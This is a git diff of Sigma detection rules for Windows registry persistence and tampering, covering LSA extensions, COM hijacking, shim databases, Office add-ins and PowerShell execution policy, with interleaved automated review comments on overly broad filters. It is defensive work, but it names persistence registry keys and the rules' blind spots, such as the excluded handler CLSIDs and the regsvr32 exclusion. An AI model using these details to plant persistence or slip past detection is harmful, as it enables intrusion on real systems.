- - \CLSID\{4887767F-7ADC-4983-B576-88FB643D6F79}\
- - \CLSID\{D3B41FA1-01E3-49AF-AA25-1D0D824275AE}\
- - \CLSID\{72773E1A-B711-4d8d-81FA-B9A43B0650DD}\
- - \CLSID\{098f2470-bae0-11cd-b579-08002b30bfeb}\
- - \CLSID\{1AA9BF05-9A97-48c1-BA28-D9DCE795E93C}\
- - \CLSID\{2e2294a9-50d7-4fe7-a09f-e6492e185884}\
- - \CLSID\{34CEAC8D-CBC0-4f77-B7B1-8A60CB6DA0F7}\
- - \CLSID\{3B224B11-9363-407e-850F-C9E1FFACD8FB}\
- - \CLSID\{3DDEB7A4-8ABF-4D82-B9EE-E1F4552E95BE}\
- - \CLSID\{5645C8C1-E277-11CF-8FDA-00AA00A14F93}\
- - \CLSID\{5645C8C4-E277-11CF-8FDA-00AA00A14F93}\
- - \CLSID\{58A9EBF6-5755-4554-A67E-A2467AD1447B}\
- - \CLSID\{5e941d80-bf96-11cd-b579-08002b30bfeb}\
- - \CLSID\{698A4FFC-63A3-4E70-8F00-376AD29363FB}\
- - \CLSID\{7E9D8D44-6926-426F-AA2B-217A819A5CCE}\
- - \CLSID\{8CD34779-9F10-4f9b-ADFB-B3FAEABDAB5A}\
- - \CLSID\{9694E38A-E081-46ac-99A0-8743C909ACB6}\
- - \CLSID\{98de59a0-d175-11cd-a7bd-00006b827d94}\
- - \CLSID\{AA10385A-F5AA-4EFF-B3DF-71B701E25E18}\
- - \CLSID\{B4132098-7A03-423D-9463-163CB07C151F}\
- - \CLSID\{d044309b-5da6-4633-b085-4ed02522e5a5}\
- - \CLSID\{D169C14A-5148-4322-92C8-754FC9D018D8}\
- - \CLSID\{DD75716E-B42E-4978-BB60-1497B92E30C4}\
- - \CLSID\{E2F83EED-62DE-4A9F-9CD0-A1D40DCD13B6}\
- - \CLSID\{E772CEB3-E203-4828-ADF1-765713D981B8}\
- - \CLSID\{eec97550-47a9-11cf-b952-00aa0051fe20}
- - \CLSID\{FB10BD80-A331-4e9e-9EB7-00279903AD99}\
+ # TODO: Add the default extension PersistentHandler.
+ # Note this could also offer blindspot as the attacker could use on of these and hijack them
+ - \CLSID\{4F46F75F-199F-4C63-8B7D-86D48FE7970C}\ # Office Open XML Format PowerPoint Persistent Handler
+ - \CLSID\{4887767F-7ADC-4983-B576-88FB643D6F79}\ # Office Open XML Format Excel Persistent Handler
+ - \CLSID\{D3B41FA1-01E3-49AF-AA25-1D0D824275AE}\ # Office Open XML Format Word Persistent Handler
+ - \CLSID\{72773E1A-B711-4d8d-81FA-B9A43B0650DD}\ # Microsoft OneNote Windows Desktop Search IFilter Persistent handler
+ - \CLSID\{098f2470-bae0-11cd-b579-08002b30bfeb}\ # Null persistent handler
+ - \CLSID\{1AA9BF05-9A97-48c1-BA28-D9DCE795E93C}\ # PDF Persistent Handler
+ - \CLSID\{2e2294a9-50d7-4fe7-a09f-e6492e185884}\ # rtf persistent handler
+ - \CLSID\{34CEAC8D-CBC0-4f77-B7B1-8A60CB6DA0F7}\ # Open Document Format ODT Persistent Handler
+ - \CLSID\{3B224B11-9363-407e-850F-C9E1FFACD8FB}\ # Zip Persistent Handler
+ - \CLSID\{3DDEB7A4-8ABF-4D82-B9EE-E1F4552E95BE}\ # Open Document Format ODS Persistent Handler
+ - \CLSID\{5645C8C1-E277-11CF-8FDA-00AA00A14F93}\ # Related to MIME Filter
+ - \CLSID\{5645C8C4-E277-11CF-8FDA-00AA00A14F93}\ # Related to MIME Filter
+ - \CLSID\{58A9EBF6-5755-4554-A67E-A2467AD1447B}\ # Setting Content File Persistent Handler
+ - \CLSID\{5e941d80-bf96-11cd-b579-08002b30bfeb}\ # Plain Text persistent handler
+ - \CLSID\{698A4FFC-63A3-4E70-8F00-376AD29363FB}\ # Wordpad OOXML Document Filter
+ - \CLSID\{7E9D8D44-6926-426F-AA2B-217A819A5CCE}\ # XML File Persistent Handler
+ - \CLSID\{8CD34779-9F10-4f9b-ADFB-B3FAEABDAB5A}\ # .url File Persistent Handler
+ - \CLSID\{9694E38A-E081-46ac-99A0-8743C909ACB6}\ # html persistent handler for mapi email
+ - \CLSID\{98de59a0-d175-11cd-a7bd-00006b827d94}\ # Microsoft Office Persistent Handler
+ - \CLSID\{AA10385A-F5AA-4EFF-B3DF-71B701E25E18}\ # Wordpad ODT Document Filter
+ - \CLSID\{B4132098-7A03-423D-9463-163CB07C151F}\ # Office Open XML Format Excel Persistent Handler
+ - \CLSID\{d044309b-5da6-4633-b085-4ed02522e5a5}\ # App Content File Persistent Handler
+ - \CLSID\{D169C14A-5148-4322-92C8-754FC9D018D8}\ # rtf persistent handler for mapi email
+ - \CLSID\{DD75716E-B42E-4978-BB60-1497B92E30C4}\ # text persistent handler for mapi email
+ - \CLSID\{E2F83EED-62DE-4A9F-9CD0-A1D40DCD13B6}\ # Open Document Format ODP Persistent Handler
+ - \CLSID\{E772CEB3-E203-4828-ADF1-765713D981B8}\ # Microsoft OneNote Section persistent handler
+ - \CLSID\{eec97550-47a9-11cf-b952-00aa0051fe20} # HTML File persistent handler
+ # - '\CLSID\{F6F00E65-9CAF-43BB-809A-38AA4621BCF2}' # XMind Persistent Handler (not present by default)
+ - \CLSID\{FB10BD80-A331-4e9e-9EB7-00279903AD99}\ # Office Outlook MSG Persistent Handler
 filter_generic_paths:
 Image|startswith:
+ # We assume if an attacker has access to one of these directories. Then he already has admin.
 - C:\Windows\System32\
 - C:\Program Files (x86)\
 - C:\Program Files\
diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_lsa_extension.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_lsa_extension.yml
index 65fbe4957..e94b75516 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_persistence_lsa_extension.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_lsa_extension.yml
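Review bot: The rationale in the new comment under `filter_generic_paths` ("access to one of these directories" implies admin) does not describe what the filter actually tests: `Image|startswith` on System32 and Program Files excludes any registration performed by a process whose image lives there, which includes system-shipped utilities such as reg.exe, regsvr32.exe and powershell.exe that any user can run, so the filter is wider than the stated assumption (any hive or user constraints on the selection are outside this hunk). Consider rewording to state the real assumption, e.g. `# Exclude registrations written by binaries installed under trusted system/program directories; tune per environment`, or narrowing to the specific installer images that were observed. Separately, `\CLSID\{eec97550-47a9-11cf-b952-00aa0051fe20}` is the only entry without a trailing backslash on both the old and new side; adding it keeps the `contains` match consistent with its neighbours. The `# Note this could also offer blindspot` line has a typo, "use on of these" should be "use one of these".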
@@ -1,13 +1,9 @@
 title: Potential Persistence Via LSA Extensions
 id: 41f6531d-af6e-4c6e-918f-b946f2b85a36
 status: experimental
-description: 'Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions"
- to include a custom DLL to achieve persistence via lsass.
-
- The "Extensions" list contains filenames of DLLs being automatically loaded by
- lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.
-
- '
+description: |
+ Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" to include a custom DLL to achieve persistence via lsass.
+ The "Extensions" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.
 references:
 - https://persistence-info.github.io/Data/lsaaextension.html
 - https://twitter.com/0gtweet/status/1476286368385019906
diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_mpnotify.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_mpnotify.yml
index 19cc20871..a3e1ca9b4 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_persistence_mpnotify.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_mpnotify.yml
@@ -1,8 +1,7 @@
 title: Potential Persistence Via Mpnotify
 id: 92772523-d9c1-4c93-9547-b0ca500baba3
 status: experimental
-description: Detects when an attacker register a new SIP provider for persistence
- and defense evasion
+description: Detects when an attacker register a new SIP provider for persistence and defense evasion
 references:
 - https://persistence-info.github.io/Data/mpnotify.html
 - https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek
@@ -23,7 +22,6 @@ detection:
 TargetObject|contains: \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\mpnotify
 condition: registry_set and selection
 falsepositives:
- - Might trigger if a legitimate new SIP provider is registered. But this is not
- a common occurrence in an environment and should be investigated either way
+ - Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way
 level: high
 ruletype: Sigma
diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_mycomputer.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_mycomputer.yml
index 3038d073f..5590f83e9 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_persistence_mycomputer.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_mycomputer.yml
@@ -1,9 +1,7 @@
 title: Potential Persistence Via MyComputer Registry Keys
 id: 8fbe98a8-8f9d-44f8-aa71-8c572e29ef06
 status: experimental
-description: Detects modification to the "Default" value of the "MyComputer" key and
- subkeys to point to a custom binary that will be launched whenever the associated
- action is executed (see reference section for example)
+description: Detects modification to the "Default" value of the "MyComputer" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)
 references:
 - https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/
 author: Nasreddine Bencherchali (Nextron Systems)
@@ -24,7 +22,6 @@ detection:
 TargetObject|endswith: (Default)
 condition: registry_set and selection
 falsepositives:
- - Unlikely but if you experience FPs add specific processes and locations you
- would like to monitor for
+ - Unlikely but if you experience FPs add specific processes and locations you would like to monitor for
 level: high
 ruletype: Sigma
diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_natural_language.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_natural_language.yml
index 8302ea501..1b883782b 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_persistence_natural_language.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_natural_language.yml
@@ -1,9 +1,7 @@
 title: Potential Persistence Via DLLPathOverride
 id: a1b1fd53-9c4a-444c-bae0-34a330fc7aa8
 status: experimental
-description: Detects when an attacker adds a new "DLLPathOverride" value to the "Natural
- Language" key in order to achieve persistence which will get invoked by "SearchIndexer.exe"
- process
+description: Detects when an attacker adds a new "DLLPathOverride" value to the "Natural Language" key in order to achieve persistence which will get invoked by "SearchIndexer.exe" process
 references:
 - https://persistence-info.github.io/Data/naturallanguage6.html
 - https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/
@@ -21,6 +19,10 @@ detection:
 EventID: 13
 Channel: Microsoft-Windows-Sysmon/Operational
 selection_root:
+ # The path can be for multiple languages
+ # Example: HKLM\System\CurrentControlSet\Control\ContentIndex\Language\English_UK
+ # HKLM\System\CurrentControlSet\Control\ContentIndex\Language\English_US
+ # HKLM\System\CurrentControlSet\Control\ContentIndex\Language\Neutral
 TargetObject|contains: \SYSTEM\CurrentControlSet\Control\ContentIndex\Language\
 selection_values:
 TargetObject|contains:
diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_office_vsto.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_office_vsto.yml
index e9ce61039..9d502a7a1 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_persistence_office_vsto.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_office_vsto.yml
@@ -1,8 +1,7 @@
 title: Potential Persistence Via Visual Studio Tools for Office
 id: 9d15044a-7cfe-4d23-8085-6ebc11df7685
 status: experimental
-description: Detects persistence via Visual Studio Tools for Office (VSTO) add-ins
- in Office applications.
+description: Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.
 references:
 - https://twitter.com/_vivami/status/1347925307643355138
 - https://vanmieghem.io/stealth-outlook-persistence/
@@ -30,7 +29,8 @@ detection:
 filter_image:
 Image|endswith:
 - \msiexec.exe
- - \regsvr32.exe
+ - \regsvr32.exe # e.g. default Evernote installation
+ # triggered by a default Office 2019 installation
 filter_office:
 Image|endswith:
 - \excel.exe
diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_outlook_todaypage.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_outlook_todaypage.yml
index 397fd950d..8eebc02e2 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_persistence_outlook_todaypage.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_outlook_todaypage.yml
@@ -1,9 +1,7 @@
 title: Potential Persistence Via Outlook Today Pages
 id: 487bb375-12ef-41f6-baae-c6a1572b4dd1
 status: experimental
-description: Detects potential persistence activity via outlook today pages. An attacker
- can set a custom page to execute arbitrary code and link to it via the registry
- key "UserDefinedUrl".
+description: Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key "UserDefinedUrl".
 references:
 - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=74
 author: Tobias Michalski (Nextron Systems)
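Review bot: In the `filter_image` hunk of registry_set_persistence_office_vsto.yml, excluding `\regsvr32.exe` outright drops every VSTO add-in registration written through that binary, while the new comment justifies it with a single benign case (a default Evernote installation); regsvr32 is a widely abused DLL-loading proxy, so the exclusion is much broader than the false positive it addresses. A filter keyed on what that installer actually writes (for example a `Details|contains` on the Evernote add-in path, using the value observed in the FP) would keep the benign case excluded without blanking the whole image; the rule's selection and condition are outside the hunk, so I cannot confirm whether another constraint already narrows it. The second added comment, `# triggered by a default Office 2019 installation`, sits between the end of `filter_image` and `filter_office:`, and it is not clear which filter it annotates; placing it directly under `filter_office:` removes the ambiguity.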
@@ -34,8 +32,7 @@ detection:
 - C:\Program Files\Common Files\Microsoft Shared\ClickToRun\
 - C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\
 Image|endswith: \OfficeClickToRun.exe
- condition: registry_set and (selection_main and 1 of selection_value_* and not
- 1 of filter_*)
+ condition: registry_set and (selection_main and 1 of selection_value_* and not 1 of filter_*)
 fields:
 - Details
 falsepositives:
diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_reflectdebugger.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_reflectdebugger.yml
index 995f35e51..8e47ae305 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_persistence_reflectdebugger.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_reflectdebugger.yml
@@ -1,11 +1,10 @@
 title: Potential WerFault ReflectDebugger Registry Value Abuse
 id: 0cf2e1c6-8d10-4273-8059-738778f981ad
 related:
- - id: fabfb3a7-3ce1-4445-9c7c-3c27f1051cdd
- type: derived
+ - id: fabfb3a7-3ce1-4445-9c7c-3c27f1051cdd
+ type: derived
 status: experimental
-description: Detects potential WerFault "ReflectDebugger" registry value abuse for
- persistence.
+description: Detects potential WerFault "ReflectDebugger" registry value abuse for persistence.
 references:
 - https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html
 - https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/
@@ -23,7 +22,7 @@ detection:
 EventID: 13
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
- EventType: SetValue
+ EventType: SetValue
 TargetObject|endswith: \Microsoft\Windows\Windows Error Reporting\Hangs\ReflectDebugger
 condition: registry_set and selection
 falsepositives:
diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_scrobj_dll.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_scrobj_dll.yml
index 38f47eb37..80a0b9dc7 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_persistence_scrobj_dll.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_scrobj_dll.yml
@@ -1,8 +1,7 @@
 title: Potential Persistence Via Scrobj.dll COM Hijacking
 id: fe20dda1-6f37-4379-bbe0-a98d400cae90
 status: experimental
-description: Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to
- get the location of the script to execute
+description: Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md
 author: frack113
diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_search_order.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_search_order.yml
index 360b1f4f5..fb38b393f 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_persistence_search_order.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_search_order.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects potential COM object hijacking leveraging the COM Search Order
 references:
 - https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/
-author: "Maxime Thiebaut (@0xThiebaut), oscd.community, C\xE9dric Hien"
+author: Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien
 date: 2020/04/14
 modified: 2023/09/28
 tags:
@@ -18,15 +18,16 @@ detection:
 registry_set:
 EventID: 13
 Channel: Microsoft-Windows-Sysmon/Operational
- selection:
+ selection: # Detect new COM servers in the user hive
 TargetObject|contains: \CLSID\
 TargetObject|endswith: \InprocServer32\(Default)
 filter_main_generic:
- Details|contains:
+ Details|contains: # Exclude privileged directories and observed FPs
 - '%%systemroot%%\system32\'
 - '%%systemroot%%\SysWow64\'
 filter_main_onedrive:
 Details|contains:
+ # Related To OneDrive
 - \AppData\Local\Microsoft\OneDrive\
 - \FileCoAuthLib64.dll
 - \FileSyncShell64.dll
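Review bot: In the `@@ -18,15 +18,16 @@` hunk of registry_set_persistence_search_order.yml, the new comment on `selection` says "in the user hive", but the visible selection (`TargetObject|contains: \CLSID\` together with `TargetObject|endswith: \InprocServer32\(Default)`) matches HKLM registrations just as well; unless a hive constraint exists outside this hunk, the comment overstates the scope. Suggest `# Detect new or modified COM InprocServer32 registrations in any hive; the filters below remove known-good locations`, or add an explicit hive restriction if the user hive really is the intended scope. The `# Exclude privileged directories and observed FPs` comment is accurate for the two listed values, but note that `'%%systemroot%%\system32\'` only excludes values written in the environment-variable form; a literal `C:\Windows\System32\` path in Details is not covered by this filter, and whether another filter handles it is not visible here.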
@@ -42,7 +43,7 @@ detection:
 - \AppData\Roaming\Dropbox\
 - \DropboxExt64.*.dll
 filter_main_trend_micro:
- Details|endswith: TmopIEPlg.dll
+ Details|endswith: TmopIEPlg.dll # TrendMicro osce
 filter_main_update:
 Image|endswith:
 - :\WINDOWS\system32\wuauclt.exe
diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_shim_database.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_shim_database.yml
index 435ecf0e2..d13a31a2a 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_persistence_shim_database.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_shim_database.yml
@@ -1,14 +1,9 @@
 title: Potential Persistence Via Shim Database Modification
 id: dfb5b4e8-91d0-4291-b40a-e3b0d3942c45
 status: experimental
-description: 'Adversaries may establish persistence and/or elevate privileges by executing
- malicious content triggered by application shims.
-
- The Microsoft Windows Application Compatibility Infrastructure/Framework (Application
- Shim) was created to allow for backward compatibility of software as the operating
- system codebase changes over time
-
- '
+description: |
+ Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.
+ The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb
 - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_shim_database_susp_application.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_shim_database_susp_application.yml
index 2dfc6b50c..98c8b64a0 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_persistence_shim_database_susp_application.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_shim_database_susp_application.yml
@@ -1,8 +1,7 @@
 title: Suspicious Shim Database Patching Activity
 id: bf344fea-d947-4ef4-9192-34d008315d3a
 status: experimental
-description: Detects installation of new shim databases that try to patch sections
- of known processes for potential process injection or persistence.
+description: Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence.
 references:
 - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/
 - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
@@ -23,6 +22,7 @@ detection:
 selection:
 TargetObject|contains: \SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\
 TargetObject|endswith:
+ # Note: add other application to increase coverage
 - \csrss.exe
 - \dllhost.exe
 - \explorer.exe
diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_shim_database_uncommon_location.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_shim_database_uncommon_location.yml
index 2a1e1ac2c..16b92a7bf 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_persistence_shim_database_uncommon_location.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_shim_database_uncommon_location.yml
@@ -1,8 +1,7 @@
 title: Potential Persistence Via Shim Database In Uncommon Location
 id: 6b6976a3-b0e6-4723-ac24-ae38a737af41
 status: experimental
-description: Detects the installation of a new shim database where the file is located
- in a non-default location
+description: Detects the installation of a new shim database where the file is located in a non-default location
 references:
 - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
 - https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/
diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_typed_paths.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_typed_paths.yml
index ce127728d..c94dadf14 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_persistence_typed_paths.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_typed_paths.yml
@@ -1,9 +1,7 @@
 title: Potential Persistence Via TypedPaths
 id: 086ae989-9ca6-4fe7-895a-759c5544f247
 status: experimental
-description: Detects modification addition to the 'TypedPaths' key in the user or
- admin registry from a non standard application. Which might indicate persistence
- attempt
+description: Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt
 references:
 - https://twitter.com/dez_/status/1560101453150257154
 - https://forensafe.com/blogs/typedpaths.html
diff --git a/sigma/sysmon/registry/registry_set/registry_set_persistence_xll.yml b/sigma/sysmon/registry/registry_set/registry_set_persistence_xll.yml
index a59bba7f7..991c94dd5 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_persistence_xll.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_persistence_xll.yml
@@ -1,8 +1,7 @@
 title: Potential Persistence Via Excel Add-in - Registry
 id: 961e33d1-4f86-4fcf-80ab-930a708b2f82
 status: experimental
-description: Detect potential persistence via the creation of an excel add-in (XLL)
- file to make it run automatically when Excel is started.
+description: Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/4ae9580a1a8772db87a1b6cdb0d03e5af231e966/atomics/T1137.006/T1137.006.md
 - https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence
diff --git a/sigma/sysmon/registry/registry_set/registry_set_policies_associations_tamper.yml b/sigma/sysmon/registry/registry_set/registry_set_policies_associations_tamper.yml
index 8850b339b..4232adfa8 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_policies_associations_tamper.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_policies_associations_tamper.yml
@@ -1,8 +1,7 @@
 title: Potential Attachment Manager Settings Associations Tamper
 id: a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47
 status: experimental
-description: Detects tampering with attachment manager settings policies associations
- to lower the default file type risks (See reference for more information)
+description: Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)
 references:
 - https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738
 - https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465
@@ -26,7 +25,7 @@ detection:
 Details: DWORD (0x00006152)
 selection_value_low_risk_filetypes:
 TargetObject|endswith: \LowRiskFileTypes
- Details|contains:
+ Details|contains: # Add more as you see fit
 - .zip;
 - .rar;
 - .exe;
diff --git a/sigma/sysmon/registry/registry_set/registry_set_policies_attachments_tamper.yml b/sigma/sysmon/registry/registry_set/registry_set_policies_attachments_tamper.yml
index af290af52..61f7ecdbb 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_policies_attachments_tamper.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_policies_attachments_tamper.yml
@@ -1,8 +1,7 @@
 title: Potential Attachment Manager Settings Attachments Tamper
 id: ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a
 status: experimental
-description: Detects tampering with attachment manager settings policies attachments
- (See reference for more information)
+description: Detects tampering with attachment manager settings policies attachments (See reference for more information)
 references:
 - https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738
 - https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465
@@ -23,13 +22,13 @@ detection:
 TargetObject|contains: \SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments\
 selection_value_hide_zone_info:
 TargetObject|endswith: \HideZoneInfoOnProperties
- Details: DWORD (0x00000001)
+ Details: DWORD (0x00000001) # On
 selection_value_save_zone_info:
 TargetObject|endswith: \SaveZoneInformation
- Details: DWORD (0x00000002)
+ Details: DWORD (0x00000002) # Off
 selection_value_scan_with_av:
 TargetObject|endswith: \ScanWithAntiVirus
- Details: DWORD (0x00000001)
+ Details: DWORD (0x00000001) # Disabled
 condition: registry_set and (selection_main and 1 of selection_value_*)
 falsepositives:
 - Unlikely
diff --git a/sigma/sysmon/registry/registry_set/registry_set_powershell_enablescripts_enabled.yml b/sigma/sysmon/registry/registry_set/registry_set_powershell_enablescripts_enabled.yml
index be481bf29..e901b1066 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_powershell_enablescripts_enabled.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_powershell_enablescripts_enabled.yml
@@ -1,11 +1,10 @@
 title: PowerShell Script Execution Policy Enabled
 id: 8218c875-90b9-42e2-b60d-0b0069816d10
 related:
- - id: fad91067-08c5-4d1a-8d8c-d96a21b37814
- type: derived
+ - id: fad91067-08c5-4d1a-8d8c-d96a21b37814
+ type: derived
 status: experimental
-description: Detects the enabling of the PowerShell script execution policy. Once
- enabled, this policy allows scripts to be executed.
+description: Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed.
 references:
 - https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableScripts
 author: Nasreddine Bencherchali (Nextron Systems), Thurein Oo
diff --git a/sigma/sysmon/registry/registry_set/registry_set_powershell_execution_policy.yml b/sigma/sysmon/registry/registry_set/registry_set_powershell_execution_policy.yml
index 5b5a2b4ed..494182301 100644
--- a/sigma/sysmon/registry/registry_set/registry_set_powershell_execution_policy.yml
+++ b/sigma/sysmon/registry/registry_set/registry_set_powershell_execution_policy.yml
@@ -1,15 +1,14 @@
 title: Potential PowerShell Execution Policy Tampering
 id: fad91067-08c5-4d1a-8d8c-d96a21b37814
 related:
- - id: cf2e938e-9a3e-4fe8-a347-411642b28a9f
- type: similar
- - id: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180
- type: similar
- - id: 61d0475c-173f-4844-86f7-f3eebae1c66b
- type: similar
+ - id: cf2e938e-9a3e-4fe8-a347-411642b28a9f # Registry
+ type: similar
+ - id: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 # ProcCreation Cmdlet
+ type: similar
+ - id: 61d0475c-173f-4844-86f7-f3eebae1c66b # PowerShell ScriptBlock
+ type: similar
 status: experimental
-description: Detects changes to the PowerShell execution policy in order to bypass
- signing requirements for script execution
+description: Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution
 references:
 - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3
 author: Nasreddine Bencherchali (Nextron Systems)
@@ -27,12 +26,16 @@ detection:
 Channel: Microsoft-Windows-Sysmon/Operational
 selection:
 TargetObject|endswith:
+ # Note for future readers: For PowerShell 7+ the ExecutionPolicy is handled via a setting file due to the fact that PWSH7 is available for mac and linux
+ # Attackers can create a per-user setting file (powershell.config.json) and set the execution policy there
+ # Learn more here: https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_powershell_config?view=powershell-7.3
 - \ShellIds\Microsoft.PowerShell\ExecutionPolicy
 - \Policies\Microsoft\Windows\PowerShell\ExecutionPolicy
 Details|contains:
 - Bypass
 - Unrestricted
 filter_main_svchost:
+ # Note: We filter out "svchost" to avoid FP with changes using "gpedit" for example.
 Image|contains:
 - :\Windows\System32\
 - :\Windows\SysWOW64\
